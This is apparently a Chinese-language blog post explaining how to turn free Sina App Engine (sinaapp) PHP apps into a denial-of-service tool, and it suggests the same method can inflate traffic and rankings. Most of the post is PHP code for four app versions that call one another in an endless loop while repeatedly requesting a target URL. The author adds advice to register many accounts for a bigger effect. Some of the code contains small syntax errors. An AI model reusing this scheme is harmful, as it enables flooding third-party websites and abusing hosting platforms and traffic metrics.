說是DDOS攻擊，實(shí)際上還可以用來刷流量和排名。估計(jì)這個(gè)想法很多大牛之前已經(jīng)有想過，昨天在使用sinaapp時(shí)測試了下，貌似可行，所以和大家分享下。

大牛小牛應(yīng)該都知道sinaapp、百度site app等都為開發(fā)者提供了很好的開放平臺，注冊也很簡單。每個(gè)用戶可以創(chuàng)建不同版本的app應(yīng)用，攻擊者可以利用該特點(diǎn)，注冊大量用戶，編寫PHP代碼對目標(biāo)發(fā)起攻擊，在測試過程中，我使用了一個(gè)帳號，創(chuàng)建了4個(gè)版本的APP進(jìn)行測試，在自己站點(diǎn)上寫了個(gè)記錄訪問者ip的文件作為被攻擊者，效果不錯，該記錄文件每秒的容量暴漲(說明app訪問被攻擊者網(wǎng)站的頻率很高)。下面看下測試步驟：

PS：主要使用sinaapp作為測試對象。

測試思路：創(chuàng)建4個(gè)版本的app.

版本1 主頁代碼如下:

<?php 
file_get_contents('http://2.mars.sinaapp.com/');//版本1觸發(fā)攻擊(訪問版本2)  
?> 

版本2 主頁代碼:

<?php 
file_get_contents('http://www.xxx.com/ip.php')://攻擊目標(biāo)  
file_get_contents('http://3.mars.sinaapp.com/');//訪問版本3  
?> 

版本3 主頁代碼:

<?php 
for ($i=1; $<=10; $i++){//這里邪惡了一下，多來幾次效果更佳  
file_get_contents('http://www.xxx.com/ip.php');  
file_get_contents('http://4.mars.sinaapp.com/'); }  
?> 

版本4 主頁代碼:

<?php 
file_get_contents('http://2.mars.sinaapp.com/');//訪問版本2，導(dǎo)致死循環(huán)  
?> 

以上是使用一個(gè)sinaapp用戶進(jìn)行攻擊的步驟，可以自己擴(kuò)展，注冊大量用戶及創(chuàng)建更多的版本進(jìn)行攻擊。但在測試過程中發(fā)現(xiàn)，每個(gè)APP實(shí)際上有兩個(gè)IP出口。使用多個(gè)用戶效果會更好。

PS:大家應(yīng)該會有個(gè)疑問，為什么要創(chuàng)建版本4，這個(gè)我也是在實(shí)驗(yàn)中發(fā)現(xiàn)的，如果使用版本2和版本3直接互調(diào)，則達(dá)不到攻擊的效果，版本2和版本3只訪問被攻擊目標(biāo)一次舊停止了。有哪位大牛知道為什么的還請不惜賜教。